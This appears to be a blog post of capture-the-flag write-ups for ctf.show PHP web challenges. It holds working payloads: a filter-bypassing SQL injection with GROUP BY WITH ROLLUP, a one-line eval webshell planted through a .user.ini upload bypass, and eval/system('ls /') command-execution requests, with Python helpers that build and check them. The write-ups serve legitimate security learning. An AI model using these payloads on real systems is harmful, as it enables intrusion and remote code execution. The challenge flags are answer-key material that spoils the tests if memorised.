[ctf.show web challenge writeups]


1. ctf.show_web10

The page is a login box.

Clicking the Cancel button reveals the source code:

<?php
    $flag="";
    function replaceSpecialChar($strParam){
        // Every match shortens the string; the callers compare lengths, so a single hit rejects the input.
        $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
        return preg_replace($regex,"",$strParam);
    }
    // $con, $username and $password are assigned elsewhere; only this fragment is shown.
    if (!$con)
    {
        die('Could not connect: ' . mysqli_error());
    }
    if(strlen($username)!=strlen(replaceSpecialChar($username))){
        die("sql inject error");
    }
    if(strlen($password)!=strlen(replaceSpecialChar($password))){
        die("sql inject error");
    }
    // $username is interpolated straight into the statement; the filter above is the only defence.
    $sql="select * from user where username = '$username'";
    $result=mysqli_query($con,$sql);
    if(mysqli_num_rows($result)>0){
        while($row=mysqli_fetch_assoc($result)){
            // Loose comparison: in PHP "" == NULL is true.
            if($password==$row['password']){
                echo "登陆成功<br>";   // "Login successful"
                echo $flag;
            }
        }
    }
?>

Most of the usual injection keywords are filtered: select, from, where, join, sleep, and, union, the comma, and every whitespace character (\s). Because the check compares string lengths, a single match rejects the input. Note what is not filtered: or, group, by, with, rollup, the # comment marker and the /* */ comment sequence. Stacked queries are not available either, since mysqli_query() runs a single statement. The trick here is GROUP BY combined with WITH ROLLUP.
GROUP BY groups the result rows by the named column (older MySQL versions also implicitly sort the groups in ascending order).
WITH ROLLUP can be appended to GROUP BY and adds a summary row after the per-group rows: in that extra row the grouped column (here password) is NULL, and count(*) is the total over all groups.
For example:

select password,count(*) from test group by password with rollup;

So we construct the payload:

username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=

The statement the server actually executes becomes

select * from user where username = 'admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#'

/**/ stands in for the filtered spaces, and # turns the closing quote into a comment. or 1=1 returns every user; the rollup appends a final row whose password column is NULL. The PHP loop compares the submitted password with == (loose comparison), and in PHP "" == NULL is true, so submitting an empty password matches that row and the flag is printed. (select * with a GROUP BY on a single non-key column is only accepted when MySQL's ONLY_FULL_GROUP_BY mode is disabled.)

This yields the flag:
ctfshow{d89ccf86-5ac9-4429-95e0-ea40b0afba89}


2. ctf.show_web11

The home page shows the PHP source, which has many restrictions.
The check that yields the flag is $password==$_SESSION['password']. We control the submitted password; the session data itself lives on the server, but the session used for a request is selected by the session cookie we send (PHPSESSID by default). Delete that cookie and the request gets a fresh, empty session, so $_SESSION['password'] is NULL; submit an empty password and the loose comparison "" == NULL is true, which bypasses the check.

Flag:
ctfshow{5f4e07ee-e7d9-4302-8b7d-f3eabfa0ed16}

3. ctf.show_web12

Check the page source first.

There is a hint about a cmd parameter, which suggests code execution in the backend.
Submitting ?cmd=phpinfo(); prints the PHP configuration, which shows that many command-execution functions are disabled (disable_functions).
The source can also be read with highlight_file("index.php");.
Another useful PHP function is glob(): it returns the file names or directories matching a pattern, for example:

glob("*")      matches any file in the current directory (dotfiles excluded)
glob("*.txt")  matches files with the .txt suffix

With this we first list the files in the current directory to see what is available. Submitting ?cmd=print_r(glob("*")); prints the file list, and then we read the file:

?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

Flag:
ctfshow{2eb6ffd3-82c8-4718-a528-9b251e5a31e9}

4. ctf.show_web13

The page has an upload form. Uploading a file has no visible effect, so we scan for hidden files and directories.

upload.php is found; requesting upload.php.bak returns the backed-up source:

<?php
    header("content-type:text/html;charset=utf-8");
    $filename = $_FILES['file']['name'];
    $temp_name = $_FILES['file']['tmp_name'];
    $size = $_FILES['file']['size'];
    $error = $_FILES['file']['error'];
    $arr = pathinfo($filename);
    $ext_suffix = $arr['extension'];   // text after the last '.', so '.user.ini' gives 'ini'
    if ($size > 24){
        die("error file zise");
    }
    if (strlen($filename)>9){          // whole name, extension included
        die("error file name");
    }
    if(strlen($ext_suffix)>3){
        die("error suffix");
    }
    if(preg_match("/php/i",$ext_suffix)){
        die("error suffix");
    }
    if(preg_match("/php/i",$filename)){
        die("error file name");
    }
    // The file keeps the client-supplied name and lands in the web root directory.
    if (move_uploaded_file($temp_name, './'.$filename)){
        echo "文件上传成功!";   // "File uploaded successfully!"
    }else{
        echo "文件上传失败!";   // "File upload failed!"
    }
?>

From the source: the file size must be at most 24 bytes, the file name (extension included) at most 9 bytes, the extension at most 3 bytes, and neither the name nor the extension may contain "php" (case-insensitive). A one-line webshell that fits is

<?php eval($_POST['a']);

which is exactly 24 bytes.

Because of the suffix rule it is uploaded as 2.txt first, and then a .user.ini file is uploaded.
PHP's documentation describes .user.ini as follows: when PHP runs as CGI/FastCGI it looks for a file of that name (user_ini.filename; if set to an empty string PHP does not search at all) in the directory of the requested script and its parent directories up to the document root, and applies the INI directives found there. The directive auto_prepend_file names a file that is included before every PHP script in that directory.
So .user.ini contains

auto_prepend_file=2.txt

written without spaces around the = sign (23 bytes; with spaces it is 25 bytes and the size check rejects it). The name .user.ini is exactly 9 bytes and pathinfo() reports its extension as ini, so it passes every filter. From then on every PHP script in that directory (upload.php, for instance) executes 2.txt first; the file is re-read when user_ini.cache_ttl expires (300 seconds by default), so a fresh upload may take a moment to take effect.

After connecting with AntSword we find that there is no permission to write files, so we look for the flag directly through the webshell. Submit by POST

a=print_r(glob("*"));

and then read the flag file with highlight_file():

a=highlight_file("filename");
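The upload checks re-implemented in Python, as an added example that is not part of the original writeup, so the two payloads can be validated offline before they are sent. Limits and error strings are copied from upload.php above; the file names and contents are the writeup's, and the helper names are my own.

```python
import re
from typing import List, Optional, Tuple

# Limits from upload.php: $size > 24, strlen($filename) > 9, strlen($ext) > 3.
MAX_SIZE = 24
MAX_NAME = 9
MAX_EXT = 3


def php_pathinfo_extension(filename: str) -> str:
    """Mimic pathinfo($filename)['extension']: the text after the last '.'
    of the basename, or '' if there is no dot. PHP treats the leading dot
    of '.user.ini' like any other, so its extension is 'ini'."""
    base = filename.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1] if "." in base else ""


def upload_check(filename: str, content: bytes) -> Optional[str]:
    """Return the message upload.php would die() with, or None if the file
    would be written. strlen() counts bytes, hence the encode() calls."""
    ext = php_pathinfo_extension(filename)
    if len(content) > MAX_SIZE:
        return "error file zise"
    if len(filename.encode()) > MAX_NAME:
        return "error file name"
    if len(ext.encode()) > MAX_EXT:
        return "error suffix"
    if re.search(r"php", ext, re.IGNORECASE):
        return "error suffix"
    if re.search(r"php", filename, re.IGNORECASE):
        return "error file name"
    return None


# The two files from the writeup; both sit exactly at the limits.
SHELL_NAME, SHELL = "2.txt", b"<?php eval($_POST['a']);"  # 24 bytes
INI_NAME, INI = ".user.ini", b"auto_prepend_file=2.txt"    # 23 bytes, 9-byte name


def plan_uploads() -> List[Tuple[str, Optional[str]]]:
    """Check each file of the chain in the order it must be uploaded
    (2.txt first, because .user.ini refers to it)."""
    return [(name, upload_check(name, data))
            for name, data in ((SHELL_NAME, SHELL), (INI_NAME, INI))]


if __name__ == "__main__":
    for name, verdict in plan_uploads():
        print(f"{name:10} -> {'accepted' if verdict is None else verdict}")
```

Running it reports both files as accepted; adding the spaces around = in the INI line, or one more byte to the shell, flips the verdict to "error file zise".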

5. Vegetable Dog Cup

1. Web sign-in

The page shows the following code:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 09:38:59
# @email: [email protected]
# @link: https://ctfer.com

*/


error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

After trying for a long time I wondered whether this is really a sign-in challenge. After reading another writeup, the summary is: the challenge tests the relationship between request methods and parameter assignment, and how a Chinese cookie name is encoded.

The eval is a deeply nested one-liner; unwind it from the inside out.
The innermost part is $_COOKIE['CTFshow-QQ群:'], i.e. the value of the cookie named CTFshow-QQ群:.
If we send the cookie CTFshow-QQ群:=a, the one-liner becomes:

eval($_REQUEST[$_GET[$_POST['a']]][6][0][7][5][8][0][9][4][4]);

$_POST['a'] is the value of the POST parameter a; sending a=b gives:

eval($_REQUEST[$_GET['b']][6][0][7][5][8][0][9][4][4]);

$_GET['b'] is the value of the GET parameter b; sending b=c in the query string gives:

eval($_REQUEST['c'][6][0][7][5][8][0][9][4][4]);

$_REQUEST accepts parameters sent by either GET or POST, and c must be an array nested exactly as written. PHP builds nested arrays from bracketed parameter names, so we assign the innermost key directly:

c[6][0][7][5][8][0][9][4][4]=system('ls /');

So we send the request with POST, taking care to URL-encode 群 as %E7%BE%A4 in the cookie name, otherwise Burp does not handle it (c can go in the query string or in the request body, because $_REQUEST accepts either).

Here I use HackBar for convenience.
ls / shows a file named f1agaaa; cat /f1agaaa prints the flag.
Learned a lot.
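The three transports of that request built with Python's standard library, together with a small emulation of PHP's parameter parsing that confirms they resolve to the intended code. This is an added example, not part of the original writeup; the parameter names a, b, c and the command are the writeup's, the helper names are my own, and it assumes PHP's default request_order, where POST is overlaid on GET when $_REQUEST is filled.

```python
from urllib.parse import quote, urlencode, parse_qs

COOKIE_NAME = "CTFshow-QQ群:"
CODE = "system('ls /');"
# Key path from eval($_REQUEST[...][6][0][7][5][8][0][9][4][4]).
KEY_PATH = ("6", "0", "7", "5", "8", "0", "9", "4", "4")


def build_request(code: str = CODE) -> dict:
    """Return the Cookie header value, query string and POST body as they
    go on the wire."""
    return {
        # PHP urldecodes cookie names, so 群 travels as %E7%BE%A4.
        "cookie": f"{quote(COOKIE_NAME, safe='')}=a",
        "query": urlencode({"b": "c"}),
        # c[6][0]... becomes a nested array on the PHP side; urlencode()
        # percent-encodes the brackets, which PHP decodes again.
        "body": urlencode({"a": "b", "c[6][0][7][5][8][0][9][4][4]": code}),
    }


def php_parse(qs: str) -> dict:
    """Emulate how PHP fills $_GET/$_POST/$_COOKIE: names such as 'c[6][0]'
    become nested arrays (string keys here; PHP would use ints).
    Only the bracket syntax used by this payload is handled."""
    out: dict = {}
    for name, values in parse_qs(qs, keep_blank_values=True).items():
        parts = name.replace("]", "").split("[")   # 'c[6][0]' -> ['c', '6', '0']
        node = out
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = values[-1]               # PHP keeps the last duplicate
    return out


def resolve(req: dict) -> str:
    """Walk $_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]] followed by
    KEY_PATH with emulated superglobals and return the string eval() sees."""
    cookie = php_parse(req["cookie"].replace("; ", "&"))
    get = php_parse(req["query"])
    post = php_parse(req["body"])
    request = {**get, **post}                      # assumed request_order: GP
    node = request[get[post[cookie[COOKIE_NAME]]]]
    for key in KEY_PATH:
        node = node[key]
    return node


if __name__ == "__main__":
    req = build_request()
    print("Cookie:", req["cookie"])
    print("GET   :", req["query"])
    print("POST  :", req["body"])
    print("eval():", resolve(req))
```

Because c is read through $_REQUEST, moving the c[...] parameter from the body into the query string (or the other way round) resolves to the same code; swapping a or b between transports does not, since those are read from $_POST and $_GET specifically.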

2. web2 c0me_t0_s1gn

The page hints that there is information to be found. I tried Yujian and dirsearch for directory scanning but could not find anything. Looking at the page source afterwards, I saw some information about the flag; following the hint there to the browser console, it printed how to find the rest of the flag, and running that produced the second half. The two halves are concatenated to form the flag.

3. I only have $ in my eyes

The page shows:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 08:21:54
# @email: [email protected]
# @link: https://ctfer.com

*/


error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);

Parameters are passed by POST, and extract($_POST) turns every POST parameter into a PHP variable. The challenge tests variable variables: in $$...$_ the first $ reads $_, and each further $ uses the previous value as the name of the next variable to read. So we define a chain of variables, each holding the name of the next, and put the command to execute, system('ls /'), in the last one. There is one variable per $ sign (the payload below has 36 assignments), and the names must not repeat, otherwise the lookups cycle and never reach the command.

Not being good at writing scripts, I referred to another writeup:

_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('ls /')
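A generator for that chain, with an emulation of how PHP resolves $...$_ after extract(), as an added example that is not part of the original writeup. DEPTH is the number of $ signs, taken from the 36 assignments in the payload above; the naming scheme (_, a..z, A..Z) is the payload's, the function names are my own.

```python
import string

DEPTH = 36
NAMES = ["_"] + list(string.ascii_lowercase) + list(string.ascii_uppercase)


def build_chain(depth: int, code: str) -> dict:
    """POST variables such that `depth` dollar signs applied to _ yield
    `code`: every name holds the name of the next, the last holds the code."""
    if not 1 <= depth <= len(NAMES):
        raise ValueError(f"depth must be between 1 and {len(NAMES)}")
    chain = {NAMES[i]: NAMES[i + 1] for i in range(depth - 1)}
    chain[NAMES[depth - 1]] = code
    return chain


def to_body(chain: dict) -> str:
    """Raw form body as in the writeup (quotes, spaces and parentheses left
    unencoded, which is how HackBar sends them)."""
    return "&".join(f"{k}={v}" for k, v in chain.items())


def resolve(variables: dict, depth: int) -> str:
    """Emulate $...$_ with `depth` dollar signs: the first $ reads _, each
    further $ reads the variable named by the previous value. A name that
    comes round twice means the chain cycles and never reaches the code,
    so it is reported instead of looping."""
    seen = set()
    name = "_"
    for _ in range(depth):
        if name in seen:
            raise RuntimeError(f"variable {name!r} repeats; the chain never reaches the code")
        seen.add(name)
        name = variables[name]
    return name


if __name__ == "__main__":
    chain = build_chain(DEPTH, "system('ls /')")
    print(to_body(chain))
    print("eval() receives:", resolve(chain, DEPTH))
```

to_body() reproduces the writeup's payload byte for byte, and resolve() returns system('ls /') only when the depth matches the number of $ signs exactly: one $ too few yields the name "I" instead of the command, which eval() would then treat as an undefined constant.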

Change the command to read the flag.


Summary

More ctfshow notes will follow.

Source: blog.csdn.net/qq_61872115/article/details/129690257